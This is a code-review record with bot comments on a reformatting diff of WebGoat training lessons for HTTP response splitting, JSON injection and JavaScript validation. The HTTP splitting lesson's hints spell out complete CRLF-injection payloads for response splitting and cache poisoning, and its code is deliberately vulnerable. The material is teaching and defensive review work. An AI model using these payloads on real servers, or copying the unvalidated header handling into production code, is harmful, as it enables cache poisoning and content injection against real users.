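Review bot: `getBrowserType` dereferences the header before its null check: `s.getHeader("user-agent").toLowerCase()` throws a NullPointerException when the request carries no User-Agent, so the `if (browser != null)` guard just below it is dead; read the header first, e.g. `String ua = s.getHeader("user-agent"); String browser = ua == null ? null : ua.toLowerCase();`. The same pattern is in `handleReadAction`, where `displayed.indexOf(UNIQUE2U)` runs on a request parameter (`READ_RESULT`) that may be absent from a hand-crafted request. The lesson state (`httpOnly`, `readSuccess`, `writeSuccess`, `original`) lives in instance fields of the lesson object rather than in the `WebSession`; if lesson instances are shared between users (not visible from this hunk), one student's clicks change another's results and completion. Separately, `setHttpOnly`/`removeHttpOnly` copy the client-supplied `unique2u` cookie value straight into a `Set-Cookie` header, so a value containing `;`, CR or LF reaches the response header unvalidated; even in a training app it is worth rejecting such values, e.g. `if (cookie != null && !cookie.matches("[A-Za-z0-9+/=]+")) cookie = null;` before the header is built.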
@@ -5,293 +6,261 @@ import java.net.URLDecoder; import java.text.DateFormat; import java.text.SimpleDateFormat; import java.util.*; - import javax.servlet.http.HttpServletResponse; - import org.apache.ecs.*; import org.apache.ecs.html.*; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * - * @author Sherif Koussa Macadamian Technologies. - * @created September 30, 2006 + * @author Sherif Koussa Macadamian Technologies. + * @created September 30, 2006 */ public class HttpSplitting extends SequentialLessonAdapter { - private final static String LANGUAGE = "language"; + private final static String LANGUAGE = "language"; - private final static String REDIRECT = "fromRedirect"; + private final static String REDIRECT = "fromRedirect"; - private static String STAGE = "stage"; + private static String STAGE = "stage"; - private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt( - "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0); + private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies") + .setBorder(0).setHspace(0).setVspace(0); - /** - * Description of the Method - * - * @param s Current WebSession - */ - public void handleRequest(WebSession s) - { - //Setting a special action to be able to submit to redirect.jsp - Form form = new Form("/WebGoat/lessons/General/redirect.jsp?" 
- + "Screen=" + String.valueOf(getScreenId()) + "&menu=" - + getDefaultCategory().getRanking().toString(), Form.POST) - .setName("form").setEncType(""); - - form.addElement(createContent(s)); - - setContent(form); - } - - - protected Element doHTTPSplitting(WebSession s) - { - ElementContainer ec = new ElementContainer(); - String lang = null; - - try + /** + * Description of the Method + * + * @param s + * Current WebSession + */ + public void handleRequest(WebSession s) { - ec.addElement(createAttackEnvironment(s)); - lang = URLDecoder.decode(s.getParser() - .getRawParameter(LANGUAGE, ""), "UTF-8"); + // Setting a special action to be able to submit to redirect.jsp + Form form = new Form("/WebGoat/lessons/General/redirect.jsp?" + "Screen=" + String.valueOf(getScreenId()) + + "&menu=" + getDefaultCategory().getRanking().toString(), Form.POST).setName("form").setEncType(""); - //Check if we are coming from the redirect page - String fromRedirect = s.getParser().getStringParameter( - "fromRedirect", ""); + form.addElement(createContent(s)); - if (lang.length() != 0 && fromRedirect.length() != 0) - { - //Split by the line separator line.separator is platform independant - String lineSep = System.getProperty("line.separator"); - String[] arrTokens = lang.toString().toUpperCase().split( - lineSep); + setContent(form); + } - //Check if the user ended the first request and wrote the second malacious reply + protected Element doHTTPSplitting(WebSession s) + { + ElementContainer ec = new ElementContainer(); + String lang = null; - if (Arrays.binarySearch(arrTokens, "CONTENT-LENGTH: 0") >= 0 - && Arrays.binarySearch(arrTokens, "HTTP/1.1 200 OK") >= 0) + try { - HttpServletResponse res = s.getResponse(); - res.setContentType("text/html"); - PrintWriter out = new PrintWriter(res.getOutputStream()); - String message = lang.substring(lang.indexOf("")); + ec.addElement(createAttackEnvironment(s)); + lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8"); 
- out.print(message); - out.flush(); - out.close(); + // Check if we are coming from the redirect page + String fromRedirect = s.getParser().getStringParameter("fromRedirect", ""); - getLessonTracker(s).setStage(2); + if (lang.length() != 0 && fromRedirect.length() != 0) + { + // Split by the line separator line.separator is platform independant + String lineSep = System.getProperty("line.separator"); + String[] arrTokens = lang.toString().toUpperCase().split(lineSep); - StringBuffer msg = new StringBuffer(); + // Check if the user ended the first request and wrote the second malacious reply - msg.append("Good Job! "); - msg - .append("This lesson has detected your successfull attack, "); - msg - .append("time to elevate your attack to a higher level. "); - msg - .append("Try again and add Last-Modified header, intercept"); - msg.append("the reply and replace it with a 304 reply."); + if (Arrays.binarySearch(arrTokens, "CONTENT-LENGTH: 0") >= 0 + && Arrays.binarySearch(arrTokens, "HTTP/1.1 200 OK") >= 0) + { + HttpServletResponse res = s.getResponse(); + res.setContentType("text/html"); + PrintWriter out = new PrintWriter(res.getOutputStream()); + String message = lang.substring(lang.indexOf("")); - s.setMessage(msg.toString()); + out.print(message); + out.flush(); + out.close(); - } - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - return (ec); - } + getLessonTracker(s).setStage(2); + StringBuffer msg = new StringBuffer(); - protected Element createContent(WebSession s) - { - return super.createStagedContent(s); - } + msg.append("Good Job! "); + msg.append("This lesson has detected your successfull attack, "); + msg.append("time to elevate your attack to a higher level. 
"); + msg.append("Try again and add Last-Modified header, intercept"); + msg.append("the reply and replace it with a 304 reply."); + s.setMessage(msg.toString()); - protected Element doStage1(WebSession s) throws Exception - { - return doHTTPSplitting(s); - } - - - protected Element doStage2(WebSession s) throws Exception - { - return doCachePoisining(s); - } - - - protected Element createAttackEnvironment(WebSession s) throws Exception - { - ElementContainer ec = new ElementContainer(); - String lang = null; - - if (getLessonTracker(s).getStage() == 1) - { - ec.addElement(new H3("Stage 1: HTTP Splitting:

")); - } - else - { - ec.addElement(new H3("Stage 2: Cache Poisoning:

")); - } - ec.addElement(new StringElement("Search by country : ")); - - lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), - "UTF-8"); - - //add the search by field - Input input = new Input(Input.TEXT, LANGUAGE, lang.toString()); - ec.addElement(input); - - Element b = ECSFactory.makeButton("Search!"); - - ec.addElement(b); - - return ec; - } - - - protected Element doCachePoisining(WebSession s) throws Exception - { - ElementContainer ec = new ElementContainer(); - - try - { - s - .setMessage("Now that you have successfully performed an HTTP Splitting, now try to poison" - + " the victim's cache. Type 'restart' in the input field if you wish to " - + " to return to the HTTP Splitting lesson.

"); - if (s.getParser().getRawParameter(LANGUAGE, "YOUR_NAME").equals( - "restart")) - { - getLessonTracker(s).getLessonProperties().setProperty(STAGE, - "1"); - return (doHTTPSplitting(s)); - } - - ec.addElement(createAttackEnvironment(s)); - String lang = URLDecoder.decode(s.getParser().getRawParameter( - LANGUAGE, ""), "UTF-8"); - String fromRedirect = s.getParser() - .getStringParameter(REDIRECT, ""); - - if (lang.length() != 0 && fromRedirect.length() != 0) - { - String lineSep = System.getProperty("line.separator"); - String dateStr = lang.substring(lang.indexOf("Last-Modified:") - + "Last-Modified:".length(), lang.indexOf(lineSep, lang - .indexOf("Last-Modified:"))); - if (dateStr.length() != 0) + } + } + } catch (Exception e) { - Calendar cal = Calendar.getInstance(); - - DateFormat sdf = new SimpleDateFormat( - "EEE, dd MMM yyyy HH:mm:ss z", Locale.US); - - if (sdf.parse(dateStr.trim()).after(cal.getTime())) - { - makeSuccess(s); - } + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); } - } + return (ec); } - catch (Exception ex) + + protected Element createContent(WebSession s) { - ec.addElement(new P().addElement(ex.getMessage())); + return super.createStagedContent(s); } - return ec; - } + protected Element doStage1(WebSession s) throws Exception + { + return doHTTPSplitting(s); + } - protected Category getDefaultCategory() - { - return Category.GENERAL; - } + protected Element doStage2(WebSession s) throws Exception + { + return doCachePoisining(s); + } + protected Element createAttackEnvironment(WebSession s) throws Exception + { + ElementContainer ec = new ElementContainer(); + String lang = null; - protected List getHints(WebSession s) - { + if (getLessonTracker(s).getStage() == 1) + { + ec.addElement(new H3("Stage 1: HTTP Splitting:

")); + } + else + { + ec.addElement(new H3("Stage 2: Cache Poisoning:

")); + } + ec.addElement(new StringElement("Search by country : ")); - List hints = new ArrayList(); - hints.add("Enter a language for the system to search by."); - hints.add("Use CR (%0d) and LF (%0a) for a new line"); - hints - .add("The Content-Length: 0 will tell the server that the first request is over."); - hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK"); - hints - .add("Try: language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>"); - hints - .add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date."); - hints - .add("Try language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>"); - hints - .add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. 
Some cache servers will take the bait and keep serving the hijacked page"); - hints - .add("Try to intercept the reply and add HTTP/1.1 304 Not Modified0d%0aDate:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT"); - return hints; + lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8"); - } + // add the search by field + Input input = new Input(Input.TEXT, LANGUAGE, lang.toString()); + ec.addElement(input); - private final static Integer DEFAULT_RANKING = new Integer(20); + Element b = ECSFactory.makeButton("Search!"); + ec.addElement(b); - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + return ec; + } + protected Element doCachePoisining(WebSession s) throws Exception + { + ElementContainer ec = new ElementContainer(); - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("HTTP Splitting"); - } + try + { + s.setMessage("Now that you have successfully performed an HTTP Splitting, now try to poison" + + " the victim's cache. Type 'restart' in the input field if you wish to " + + " to return to the HTTP Splitting lesson.

"); + if (s.getParser().getRawParameter(LANGUAGE, "YOUR_NAME").equals("restart")) + { + getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1"); + return (doHTTPSplitting(s)); + } + ec.addElement(createAttackEnvironment(s)); + String lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8"); + String fromRedirect = s.getParser().getStringParameter(REDIRECT, ""); - public Element getCredits() - { - return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); - } + if (lang.length() != 0 && fromRedirect.length() != 0) + { + String lineSep = System.getProperty("line.separator"); + String dateStr = lang.substring(lang.indexOf("Last-Modified:") + "Last-Modified:".length(), lang + .indexOf(lineSep, lang.indexOf("Last-Modified:"))); + if (dateStr.length() != 0) + { + Calendar cal = Calendar.getInstance(); + + DateFormat sdf = new SimpleDateFormat("EEE, dd MMM yyyy HH:mm:ss z", Locale.US); + + if (sdf.parse(dateStr.trim()).after(cal.getTime())) + { + makeSuccess(s); + } + } + } + } catch (Exception ex) + { + ec.addElement(new P().addElement(ex.getMessage())); + } + return ec; + } + + protected Category getDefaultCategory() + { + return Category.GENERAL; + } + + protected List getHints(WebSession s) + { + + List hints = new ArrayList(); + hints.add("Enter a language for the system to search by."); + hints.add("Use CR (%0d) and LF (%0a) for a new line"); + hints.add("The Content-Length: 0 will tell the server that the first request is over."); + hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK"); + hints + .add("Try: language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>"); + hints + .add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date."); + hints + .add("Try 
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>"); + hints + .add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page"); + hints + .add("Try to intercept the reply and add HTTP/1.1 304 Not Modified0d%0aDate:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT"); + return hints; + + } + + private final static Integer DEFAULT_RANKING = new Integer(20); + + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + + /** + * Gets the title attribute of the HelloScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("HTTP Splitting"); + } + + public Element getCredits() + { + return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java index 90fd63c6d..fe44a476f 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java @@ -1,7 +1,7 @@ + package org.owasp.webgoat.lessons; import org.owasp.webgoat.session.WebSession; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
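Review bot: `doHTTPSplitting` calls `Arrays.binarySearch(arrTokens, ...)` on an array that is never sorted, so the result is unspecified and the success detection depends on which elements the probe happens to visit; use a linear lookup such as `List<String> tokens = Arrays.asList(arrTokens); if (tokens.contains("CONTENT-LENGTH: 0") && tokens.contains("HTTP/1.1 200 OK"))`, or sort the array first. The split key `System.getProperty("line.separator")` is also host-dependent while the hints tell the student to inject `%0d%0a`; on a Unix host the tokens keep a trailing `\r` and never equal `"HTTP/1.1 200 OK"`, so `lang.toUpperCase().split("\\r?\\n")` would make the check consistent with the hint (the comment calling `line.separator` platform independent states the opposite of what it does). `lang.substring(lang.indexOf(""))` is a no-op because `indexOf("")` returns 0; it looks like the intended marker literal was lost, and the marker should be spelled out explicitly. Writing the attacker-shaped `message` to the response is the lesson's intent, but the `PrintWriter` is created and closed without try/finally, so an exception between them leaves the response stream unflushed.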
@@ -13,303 +13,286 @@ import org.apache.ecs.html.TR; import org.apache.ecs.html.TD; import org.apache.ecs.html.Input; import org.apache.ecs.html.BR; - import java.io.PrintWriter; import java.util.List; import java.util.ArrayList; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * - * @author Sherif Koussa Macadamian Technologies. - * @created December 25, 2006 + * @author Sherif Koussa Macadamian Technologies. + * @created December 25, 2006 */ public class JSONInjection extends LessonAdapter { - private final static Integer DEFAULT_RANKING = new Integer(30); + private final static Integer DEFAULT_RANKING = new Integer(30); - private final static String TRAVEL_FROM = "travelFrom"; + private final static String TRAVEL_FROM = "travelFrom"; - private final static String TRAVEL_TO = "travelTo"; + private final static String TRAVEL_TO = "travelTo"; - private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt( - "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0); + private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies") + .setBorder(0).setHspace(0).setVspace(0); - public void handleRequest(WebSession s) - { - - try + public void handleRequest(WebSession s) { - if (s.getParser().getRawParameter("from", "").equals("ajax")) - { + + try + { + if (s.getParser().getRawParameter("from", "").equals("ajax")) + { + String lineSep = System.getProperty("line.separator"); + String jsonStr = "{" + lineSep + "\"From\": \"Boston\"," + lineSep + "\"To\": \"Seattle\", " + lineSep + + "\"flights\": [" + lineSep + + "{\"stops\": \"0\", \"transit\" : \"N/A\", \"price\": \"$600\"}," + lineSep + + "{\"stops\": \"2\", \"transit\" : \"Newark,Chicago\", 
\"price\": \"$300\"} " + lineSep + "]" + + lineSep + "}"; + s.getResponse().setContentType("text/html"); + s.getResponse().setHeader("Cache-Control", "no-cache"); + PrintWriter out = new PrintWriter(s.getResponse().getOutputStream()); + out.print(jsonStr); + out.flush(); + out.close(); + return; + } + } catch (Exception ex) + { + ex.printStackTrace(); + } + + Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType(""); + form.setOnSubmit("return check();"); + + form.addElement(createContent(s)); + + setContent(form); + + } + + /** + * Description of the Method + * + * @param s + * Current WebSession + */ + + protected Element createContent(WebSession s) + { + ElementContainer ec = new ElementContainer(); String lineSep = System.getProperty("line.separator"); - String jsonStr = "{" - + lineSep - + "\"From\": \"Boston\"," - + lineSep - + "\"To\": \"Seattle\", " - + lineSep - + "\"flights\": [" - + lineSep - + "{\"stops\": \"0\", \"transit\" : \"N/A\", \"price\": \"$600\"}," - + lineSep - + "{\"stops\": \"2\", \"transit\" : \"Newark,Chicago\", \"price\": \"$300\"} " - + lineSep + "]" + lineSep + "}"; - s.getResponse().setContentType("text/html"); - s.getResponse().setHeader("Cache-Control", "no-cache"); - PrintWriter out = new PrintWriter(s.getResponse() - .getOutputStream()); - out.print(jsonStr); - out.flush(); - out.close(); - return; - } + String script = "" + lineSep; + ec.addElement(new StringElement(script)); + Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center"); + + TR tr = new TR(); + + tr.addElement(new TD("From: ")); + Input in = new Input(Input.TEXT, TRAVEL_FROM, ""); + in.addAttribute("onkeyup", "getFlights();"); + in.addAttribute("id", TRAVEL_FROM); + tr.addElement(new TD(in)); + + t1.addElement(tr); + + tr = new TR(); + tr.addElement(new TD("To: ")); + in = new Input(Input.TEXT, TRAVEL_TO, ""); + in.addAttribute("onkeyup", "getFlights();"); + in.addAttribute("id", TRAVEL_TO); + 
tr.addElement(new TD(in)); + + t1.addElement(tr); + ec.addElement(t1); + + ec.addElement(new BR()); + ec.addElement(new BR()); + Div div = new Div(); + div.addAttribute("name", "flightsDiv"); + div.addAttribute("id", "flightsDiv"); + ec.addElement(div); + + Input b = new Input(); + b.setType(Input.SUBMIT); + b.setValue("Submit"); + b.setName("SUBMIT"); + ec.addElement(b); + + Input price2Submit = new Input(); + price2Submit.setType(Input.HIDDEN); + price2Submit.setName("price2Submit"); + price2Submit.setValue(""); + price2Submit.addAttribute("id", "price2Submit"); + ec.addElement(price2Submit); + if (s.getParser().getRawParameter("radio0", "").equals("on")) + { + String price = s.getParser().getRawParameter("price2Submit", ""); + price = price.replace("$", ""); + if (Integer.parseInt(price) < 600) + { + makeSuccess(s); + } + else + { + s.setMessage("You are close, try to set the price for the non-stop flight to be less than $600"); + } + } + return ec; } - catch (Exception ex) + + public Element getCredits() { - ex.printStackTrace(); + return super.getCustomCredits("Created by Sherif Koussa", MAC_LOGO); } - Form form = new Form(getFormAction(), Form.POST).setName("form") - .setEncType(""); - form.setOnSubmit("return check();"); - - form.addElement(createContent(s)); - - setContent(form); - - } - - - /** - * Description of the Method - * - * @param s Current WebSession - */ - - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - String lineSep = System.getProperty("line.separator"); - String script = "" + lineSep; - ec.addElement(new StringElement(script)); - Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0) - .setWidth("90%").setAlign("center"); - - TR tr = new TR(); - - tr.addElement(new TD("From: ")); - Input in = new Input(Input.TEXT, TRAVEL_FROM, ""); - in.addAttribute("onkeyup", "getFlights();"); - in.addAttribute("id", TRAVEL_FROM); - tr.addElement(new TD(in)); - - t1.addElement(tr); - - tr 
= new TR(); - tr.addElement(new TD("To: ")); - in = new Input(Input.TEXT, TRAVEL_TO, ""); - in.addAttribute("onkeyup", "getFlights();"); - in.addAttribute("id", TRAVEL_TO); - tr.addElement(new TD(in)); - - t1.addElement(tr); - ec.addElement(t1); - - ec.addElement(new BR()); - ec.addElement(new BR()); - Div div = new Div(); - div.addAttribute("name", "flightsDiv"); - div.addAttribute("id", "flightsDiv"); - ec.addElement(div); - - Input b = new Input(); - b.setType(Input.SUBMIT); - b.setValue("Submit"); - b.setName("SUBMIT"); - ec.addElement(b); - - Input price2Submit = new Input(); - price2Submit.setType(Input.HIDDEN); - price2Submit.setName("price2Submit"); - price2Submit.setValue(""); - price2Submit.addAttribute("id", "price2Submit"); - ec.addElement(price2Submit); - if (s.getParser().getRawParameter("radio0", "").equals("on")) + protected Category getDefaultCategory() { - String price = s.getParser().getRawParameter("price2Submit", ""); - price = price.replace("$", ""); - if (Integer.parseInt(price) < 600) - { - makeSuccess(s); - } - else - { - s - .setMessage("You are close, try to set the price for the non-stop flight to be less than $600"); - } + return Category.AJAX_SECURITY; } - return ec; - } - public Element getCredits() - { - return super.getCustomCredits("Created by Sherif Koussa", MAC_LOGO); - } + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("JSON stands for JavaScript Object Notation."); + hints.add("JSON is a way of representing data just like XML."); + hints.add("The JSON payload is easily interceptable."); + hints.add("Intercept the reply, change the $600 to $25."); + return hints; - protected Category getDefaultCategory() - { - return Category.AJAX_SECURITY; - } + } + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("JSON stands for JavaScript Object Notation."); - hints.add("JSON is a way of 
representing data just like XML."); - hints.add("The JSON payload is easily interceptable."); - hints.add("Intercept the reply, change the $600 to $25."); - return hints; - - } - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("JSON Injection"); - } + /** + * Gets the title attribute of the HelloScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("JSON Injection"); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java b/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java index 84fad2cbd..2efd75c8e 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java @@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; import java.util.regex.Pattern; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
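Review bot: `Integer.parseInt(price)` in the new `createContent` body runs on the request-controlled `price2Submit` value with only `$` stripped, so any non-numeric submission throws NumberFormatException out of `createContent`; the try/catch in `handleRequest` wraps only the ajax branch, and `form.addElement(createContent(s))` sits outside it, so the request fails instead of the lesson reporting a message. Parsing inside a narrow catch and treating an unparsable price as "not solved" keeps the failure inside the lesson, as sketched below. Separately, the `catch (Exception ex) { ex.printStackTrace(); }` in `handleRequest` discards the error for the ajax path; at minimum `s.setMessage("Error generating " + this.getClass().getName());` as the sibling lessons do would surface it.
```java
// … unchanged: form construction up to the hidden price2Submit input …
if (s.getParser().getRawParameter("radio0", "").equals("on"))
{
    String price = s.getParser().getRawParameter("price2Submit", "").replace("$", "");
    int priceValue;
    try
    {
        priceValue = Integer.parseInt(price);
    } catch (NumberFormatException nfe)
    {
        s.setMessage("The submitted price is not a number");
        return ec;
    }
    if (priceValue < 600)
    // … unchanged: makeSuccess / "You are close" branches …
```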
@@ -13,321 +13,271 @@ import org.apache.ecs.html.IMG; import org.apache.ecs.html.Input; import org.apache.ecs.html.P; import org.apache.ecs.html.TextArea; - import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class JavaScriptValidation extends LessonAdapter { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); - ElementContainer ec = new ElementContainer(); - - // Regular expressions in Java and JavaScript compatible form - - // Note: if you want to use the regex=new RegExp(\"" + regex + "\");" syntax - - // you'll have to use \\\\d to indicate a digit for example -- one escaping for Java and one for JavaScript - - String regex1 = "^[a-z]{3}$";// any three lowercase letters - String regex2 = "^[0-9]{3}$";// any three digits - String regex3 = "^[a-zA-Z0-9 ]*$";// alphanumerics and space without punctuation - String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";// enumeration of numbers - String regex5 = "^\\d{5}$";// simple zip code - String 
regex6 = "^\\d{5}(-\\d{4})?$";// zip with optional dash-four - String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";//US phone number with or without dashes - Pattern pattern1 = Pattern.compile(regex1); - Pattern pattern2 = Pattern.compile(regex2); - Pattern pattern3 = Pattern.compile(regex3); - Pattern pattern4 = Pattern.compile(regex4); - Pattern pattern5 = Pattern.compile(regex5); - Pattern pattern6 = Pattern.compile(regex6); - Pattern pattern7 = Pattern.compile(regex7); - String lineSep = System.getProperty("line.separator"); - String script = "" + lineSep; - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - String param1 = s.getParser().getRawParameter("field1", "abc"); - String param2 = s.getParser().getRawParameter("field2", "123"); - String param3 = s.getParser().getRawParameter("field3", - "abc 123 ABC"); - String param4 = s.getParser().getRawParameter("field4", "seven"); - String param5 = s.getParser().getRawParameter("field5", "90210"); - String param6 = s.getParser().getRawParameter("field6", - "90210-1111"); - String param7 = 